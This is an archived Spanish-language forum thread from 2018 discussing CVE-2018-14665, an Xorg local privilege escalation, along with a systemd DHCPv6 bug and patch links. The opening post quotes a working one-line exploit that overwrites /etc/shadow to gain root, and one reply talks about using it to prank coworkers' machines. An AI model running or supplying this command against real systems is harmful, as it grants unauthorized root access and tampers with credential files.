Bienvenido a Internet ■Volver al BBS■ Hilo completo ▼Bajar▼
■ Este hilo se encuentra guardado en el archivo

0day encontrado en Xorg (*nix) (10 respuestas)

1 : root@bienvenidoainternet.org:~# : 26/10/18(vie)19:31:35 ID:QAJ8wiKwa

https://twitter.com/hackerfantastic/status/1055517801224396800

>"#CVE-2018-14665 - a LPE exploit via (link: http://X.org) X.org fits in a tweet

>cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

>Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected."

Hora de usar apt.

2 : root@bienvenidoainternet.org:~# : 26/10/18(vie)20:12:24 ID:xJOrqoesa

Me sorprende que no hayan descubierto algo así antes.

3 : root@bienvenidoainternet.org:~# : 27/10/18(sab)08:26:07 ID:A2aryQ1ia

Lo probé en el terminal y funciona perfectamente. Mi clave de 24 caracteres no sirve para una mierda ????

En mi distro aún no aparece nada. Me pregunto si el resto ya lo habrá parcheao. Quiero hacer bromear con las computadoras de un par de compañeres. "hostname: tu 4n0 fu3 j4k34d0. s41u2 j4j4j4"

4 : root@bienvenidoainternet.org:~# : 27/10/18(sab)13:38:41 ID:VjqUPwXc0

Igual estás cagado cuando alguien tiene acceso físico a tu máquina de todos modos.

5 : root@bienvenidoainternet.org:~# : 27/10/18(sab)14:06:31 ID:nZpTEeJo0

https://security-tracker.debian.org/tracker/CVE-2018-14665

6 : root@bienvenidoainternet.org:~# : 27/10/18(sab)15:49:03 ID:P5R2KrDya!

No era tan meme quitar el systemd ww

https://www.theregister.co.uk/2018/10/26/systemd_dhcpv6_rce/

>A nasty DHCPv6 packet can pwn a vulnerable Linux box.

>systemd-networkd is vulnerable to an out-of-bounds heap write in the DHCPv6 client when handling options sent by network adjacent DHCP servers. A attacker could exploit this via malicious DHCP server to corrupt heap memory on client machines, resulting in a denial of service or potential code execution.

>Systemd creator Leonard Poettering has already published a security fix for the vulnerable component – this should be weaving its way into distros as we type.

7 : root@bienvenidoainternet.org:~# : 27/10/18(sab)15:58:07 ID:P5R2KrDya!

Esto podría ser usado para joder un sitio X, como por ejemplo el N i d o??

Igual el staff debería actualizar luego los paquetes, no falta el tipo que "aprovecha el bug"

8 : root@bienvenidoainternet.org:~# : 27/10/18(sab)22:44:36 ID:ZK4p/LhIa

Habría que tener acceso a la máquina para eso.

9 : root@bienvenidoainternet.org:~# : 28/10/18(dom)07:54:07 ID:lgj4BVJh0!

>>6 ya dale pero qué tiene que ver eso con la vulnerabilidad de xorg?

10 : root@bienvenidoainternet.org:~# : 02/11/18(vie)15:25:46 ID:C7alh5Tga

https://seclists.org/oss-sec/2018/q4/123

Intel la está pasando mal....
3 KB
■ Este hilo se encuentra guardado en el archivo
■Volver al BBS■ Hilo completo ▲Subir▲
weabot.py ver 0.11.0 Bienvenido a Internet BBS/IB